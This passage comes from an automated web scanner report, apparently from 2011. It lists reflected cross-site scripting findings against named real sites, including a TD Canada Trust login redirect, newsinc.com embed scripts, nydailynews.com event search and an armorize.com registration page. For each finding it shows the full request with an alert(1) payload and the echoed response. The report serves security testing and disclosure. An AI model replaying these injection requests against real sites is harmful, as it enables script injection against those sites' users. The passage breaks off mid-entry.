Host: easywebsoc.tdcanadatrust.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrandReferrer=http%3A//www.tdcanadatrust.com/products-services/banking/index-banking.jsp; mbox=session#1317130064411-279159#1317132430|check#true#1317130630; s_pers=%20s_vnum_d%3D1317186000473%2526vn%253D1%7C1317186000473%3B%20s_vnum_w%3D1317531600477%2526vn%253D1%7C1317531600477%3B%20s_vnum_m%3D1317445200480%2526vn%253D1%7C1317445200480%3B%20s_cmchan%3D%255B%255B'Natural%252520Search'%252C'1317130067485'%255D%252C%255B'Referrers'%252C'1317130108011'%255D%255D%7C1474982908011%3B%20sinvisit_d%3Dtrue%7C1317132370580%3B%20sinvisit_w%3Dtrue%7C1317132370587%3B%20sinvisit_m%3Dtrue%7C1317132370590%3B%20s_nr%3D1317130570597%7C1319722570597%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3Dundefinedwww.tdcanadatrust.comwww.tdcanadatrust.com%3B%20s_sq%3D%3B; com.td.WAWID=easyweb.tdcanadatrust.com; sitecontext=48790aaa-b1a4-4884-9226-8425d8c74fcb

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:36:19 GMT
Server: IBM_HTTP_Server
Content-Length: 536
Set-Cookie: JSESSIONID=0000ZGwhhLyTnyoO9cJSua3lhqw:15aml0faa; Path=/; Secure
Set-Cookie: JSESSIONID=0000QVwrxccGU8_Z2zPHyMp3M1P:15aml0faa; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CUR DEV PSA PSD CONo TELo ADM TAI OUR LEG PHY ONL UNI FIN CNT PRE GOV PUR NAV INT COM STA"
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


<html>
<head>
   <script language="JavaScript">
       function sendToLogin(){        
           document.cipRedirect.submit();            
       }
   </script>
</head>
<body onload="sendToLogin()">
<form name="cipRedirect
...[SNIP]...
<input type="hidden" name ="goto" value="https%3A%2F%2Feasywebsoc.tdcanadatrust.com%2Fservlet%2Fca.tdbank.banking.servlet.CIPLoginRedirectServlet%3FFPL%3DCORE404bd"><script>alert(1)</script>c247f5df9d1"/>
...[SNIP]...

2.31. http://embed.newsinc.com/TopPicks/embed.js [&wid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://embed.newsinc.com
Path:   /TopPicks/embed.js

Issue detail

The value of the &wid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89059"%3balert(1)//e717c220ca was submitted in the &wid parameter. This input was echoed as 89059";alert(1)//e717c220ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TopPicks/embed.js?&wid=196189059"%3balert(1)//e717c220ca&cid=507&freewheel=90051&sitesection=nydailynews_us_sty&parent=ndn_sliding_launcher HTTP/1.1
Host: embed.newsinc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 13:21:38 GMT
Content-Length: 1113

function AddNDNiFrameToPage() {
var frame = document.createElement("iframe");
frame.id = "ndn_frame";
frame.scrolling = 'no';
frame.frameBorder = 0;
frame.setAttribute('m
...[SNIP]...
ute('class','');
frame.style.margin= "0";
if (navigator.userAgent.match(/(iphone|ipod|ipad)/i)) {
frame.src = "http://assets.newsinc.com/launchers/thumbnailLauncher5.html?wid=196189059";alert(1)//e717c220ca&cid=507&freewheel=90051&sitesection=nydailynews_us_sty";
}
else {
frame.src = "http://widget.newsinc.com/_fw/common/toppicks_common.html?wid=196189059";alert(1)//e717c220ca&cid=5
...[SNIP]...

2.32. http://embed.newsinc.com/TopPicks/embed.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://embed.newsinc.com
Path:   /TopPicks/embed.js

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e678"%3balert(1)//a8c33b60be7 was submitted in the cid parameter. This input was echoed as 7e678";alert(1)//a8c33b60be7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TopPicks/embed.js?&wid=1961&cid=5077e678"%3balert(1)//a8c33b60be7&freewheel=90051&sitesection=nydailynews_us_sty&parent=ndn_sliding_launcher HTTP/1.1
Host: embed.newsinc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 13:21:41 GMT
Content-Length: 1115

function AddNDNiFrameToPage() {
var frame = document.createElement("iframe");
frame.id = "ndn_frame";
frame.scrolling = 'no';
frame.frameBorder = 0;
frame.setAttribute('m
...[SNIP]...
ss','');
frame.style.margin= "0";
if (navigator.userAgent.match(/(iphone|ipod|ipad)/i)) {
frame.src = "http://assets.newsinc.com/launchers/thumbnailLauncher5.html?wid=1961&cid=5077e678";alert(1)//a8c33b60be7&freewheel=90051&sitesection=nydailynews_us_sty";
}
else {
frame.src = "http://widget.newsinc.com/_fw/common/toppicks_common.html?wid=1961&cid=5077e678";alert(1)//a8c33b60be7&free
...[SNIP]...

2.33. http://embed.newsinc.com/TopPicks/embed.js [freewheel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://embed.newsinc.com
Path:   /TopPicks/embed.js

Issue detail

The value of the freewheel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d71a"%3balert(1)//552e8991cf7 was submitted in the freewheel parameter. This input was echoed as 1d71a";alert(1)//552e8991cf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TopPicks/embed.js?&wid=1961&cid=507&freewheel=900511d71a"%3balert(1)//552e8991cf7&sitesection=nydailynews_us_sty&parent=ndn_sliding_launcher HTTP/1.1
Host: embed.newsinc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 13:21:44 GMT
Content-Length: 1115

function AddNDNiFrameToPage() {
var frame = document.createElement("iframe");
frame.id = "ndn_frame";
frame.scrolling = 'no';
frame.frameBorder = 0;
frame.setAttribute('m
...[SNIP]...
rame.style.margin= "0";
if (navigator.userAgent.match(/(iphone|ipod|ipad)/i)) {
frame.src = "http://assets.newsinc.com/launchers/thumbnailLauncher5.html?wid=1961&cid=507&freewheel=900511d71a";alert(1)//552e8991cf7&sitesection=nydailynews_us_sty";
}
else {
frame.src = "http://widget.newsinc.com/_fw/common/toppicks_common.html?wid=1961&cid=507&freewheel=900511d71a";alert(1)//552e8991cf7&site
...[SNIP]...

2.34. http://embed.newsinc.com/TopPicks/embed.js [parent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://embed.newsinc.com
Path:   /TopPicks/embed.js

Issue detail

The value of the parent request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb8a4'%3balert(1)//df2069abede was submitted in the parent parameter. This input was echoed as bb8a4';alert(1)//df2069abede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TopPicks/embed.js?&wid=1961&cid=507&freewheel=90051&sitesection=nydailynews_us_sty&parent=ndn_sliding_launcherbb8a4'%3balert(1)//df2069abede HTTP/1.1
Host: embed.newsinc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 13:21:49 GMT
Content-Length: 1087

function AddNDNiFrameToPage() {
var frame = document.createElement("iframe");
frame.id = "ndn_frame";
frame.scrolling = 'no';
frame.frameBorder = 0;
frame.setAttribute('m
...[SNIP]...
common.html?wid=1961&cid=507&freewheel=90051&sitesection=nydailynews_us_sty";
}
frame.height = 250;
frame.width = 300;
var parent = document.getElementById('ndn_sliding_launcherbb8a4';alert(1)//df2069abede');
if (typeof parent === "undefined" || parent === null) { parent = document.getElementsByTagName('body')[0]; }
parent.appendChild(frame);
}
AddNDNiFrameToPage();

2.35. http://embed.newsinc.com/TopPicks/embed.js [sitesection parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://embed.newsinc.com
Path:   /TopPicks/embed.js

Issue detail

The value of the sitesection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 315ea"%3balert(1)//d468f823b88 was submitted in the sitesection parameter. This input was echoed as 315ea";alert(1)//d468f823b88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TopPicks/embed.js?&wid=1961&cid=507&freewheel=90051&sitesection=nydailynews_us_sty315ea"%3balert(1)//d468f823b88&parent=ndn_sliding_launcher HTTP/1.1
Host: embed.newsinc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 13:21:46 GMT
Content-Length: 1115

function AddNDNiFrameToPage() {
var frame = document.createElement("iframe");
frame.id = "ndn_frame";
frame.scrolling = 'no';
frame.frameBorder = 0;
frame.setAttribute('m
...[SNIP]...
f (navigator.userAgent.match(/(iphone|ipod|ipad)/i)) {
frame.src = "http://assets.newsinc.com/launchers/thumbnailLauncher5.html?wid=1961&cid=507&freewheel=90051&sitesection=nydailynews_us_sty315ea";alert(1)//d468f823b88";
}
else {
frame.src = "http://widget.newsinc.com/_fw/common/toppicks_common.html?wid=1961&cid=507&freewheel=90051&sitesection=nydailynews_us_sty315ea";alert(1)//d468f823b88";

...[SNIP]...

2.36. http://events.nydailynews.com/partner_json/search [image_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the image_size request parameter is copied into the HTML document as plain text between tags. The payload c1eaf<script>alert(1)</script>18f58aa3bc5 was submitted in the image_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=4&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumbc1eaf<script>alert(1)</script>18f58aa3bc5&v=&cat=24%2C17%2C19%2C5%2C6%2C32%2C1325%2C80%2C35%2C1725%2C42%2C9&radius=200&where=New+York%2C+NY&tag=&when=next+30+Days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 27 Sep 2011 13:21:06 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 103
ETag: "b9d06da992a2693bdfdf1a826cbf1afb"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: e9336f9180cf2419a785c63294f8884ede67bcf2
Z-REQUEST-HANDLED-BY: www20
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 3538

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Oktoberfest at Pullcart","has_tickets":true,"tickets_on_sale":null,"venue_id":1088369,"id":211974285,"images":[{"url":"http://www.zvents.com/images/internal/4/8/7/5/img_14745784_thumbc1eaf<script>alert(1)</script>18f58aa3bc5.jpg?resample_method=","height":null,"width":null}],"starttime":"Sat Oct 01 13:00:00 UTC 2011","zurl":"/new-york-ny/events/show/211974285-oktoberfest-at-pullcart"},{"name":"Yo Gabba Gabba! Live! It\'s
...[SNIP]...

2.37. http://events.nydailynews.com/partner_json/search [jsonsp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload d0c3d<script>alert(1)</script>94fc7989631 was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=4&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=24%2C17%2C19%2C5%2C6%2C32%2C1325%2C80%2C35%2C1725%2C42%2C9&radius=200&where=New+York%2C+NY&tag=&when=next+30+Days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0d0c3d<script>alert(1)</script>94fc7989631 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 27 Sep 2011 13:21:11 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 120
ETag: "047a90bd01167c3afa438a5137716329"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 43740e59b98821813bd2828ec77037943c1cab85
Z-REQUEST-HANDLED-BY: www10
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 3463

jsp_0d0c3d<script>alert(1)</script>94fc7989631('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Oktoberfest at Pullcart","has_tickets":true,"tickets_on_sale":null,"venue_id":1088369,"id":211974285,"images":[{"url":"http://www.zvents.c
...[SNIP]...

2.38. http://events.nydailynews.com/partner_json/search [limit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload 1ce51<script>alert(1)</script>92e5e1f18fe was submitted in the limit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=1ce51<script>alert(1)</script>92e5e1f18fe&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=24%2C17%2C19%2C5%2C6%2C32%2C1325%2C80%2C35%2C1725%2C42%2C9&radius=200&where=New+York%2C+NY&tag=&when=next+30+Days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 27 Sep 2011 13:21:06 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 85
ETag: "041495dee957818914f3a4b947213b9a"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 83bd2ff328a67e8d222584f3246c74c18c735786
Z-REQUEST-HANDLED-BY: www29
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 1736

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Oktoberfest at Pullcart","has_tickets":true,"tickets_on_sale":null,"venue_id":1088369,"id":211974285,"images":[{"url":"http://www.zv
...[SNIP]...
te":"NY"},"sort":0,"offset":0,"when":"next 30 Days","what":"","catex":null,"limit":1,"sst":1317182400},"next_page":true,"identifier": "st=event&when=next+30+Days&where=New+York%2CNY&ssi=0&ssrss=1&srss=1ce51<script>alert(1)</script>92e5e1f18fe&cat=24,17,19,5,6,32,1325,80,35,1725,42,9"}}})')

2.39. http://events.nydailynews.com/partner_json/search [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 775af<script>alert(1)</script>6ad47212515 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=4&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=24%2C17%2C19%2C5%2C6%2C32%2C1325%2C80%2C35%2C1725%2C42%2C9&radius=200&where=New+York%2C+NY&tag=&when=next+30+Days&what=&nbh=&rand_spn=5&st=event775af<script>alert(1)</script>6ad47212515&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 27 Sep 2011 13:21:10 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 18
ETag: "3d2bd705a467af5cb64df9f3ce89e326"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 5db67a038bea2f27d08ee639b26cefb1cadedcf8
Z-REQUEST-HANDLED-BY: www9
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 131

{"rsp":{"status":"failed","msg":"Invalid search: event775af<script>alert(1)</script>6ad47212515 is not a valid search category."}}

2.40. http://events.nydailynews.com/partner_json/search [when parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the when request parameter is copied into the HTML document as plain text between tags. The payload 7bd7d<script>alert(1)</script>e2979efc90c was submitted in the when parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=4&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=24%2C17%2C19%2C5%2C6%2C32%2C1325%2C80%2C35%2C1725%2C42%2C9&radius=200&where=New+York%2C+NY&tag=&when=next+30+Days7bd7d<script>alert(1)</script>e2979efc90c&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 27 Sep 2011 13:21:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 16
ETag: "2f7a2bc962b9409367b3e259ee9276e6"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 41965c8fa3764756fa322f5fdac69ca195569d2c
Z-REQUEST-HANDLED-BY: www26
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 476

{"rsp":{"status":"failed","msg":"Unrecognized date format: next 30 Days7bd7d<script>alert(1)</script>e2979efc90c is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

2.41. https://hackalert.armorize.com/register.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f662"><script>alert(1)</script>25a9cf2398e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/9f662"><script>alert(1)</script>25a9cf2398e HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:46:16 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/9f662"><script>alert(1)</script>25a9cf2398e?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.42. https://hackalert.armorize.com/register.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php

Issue detail

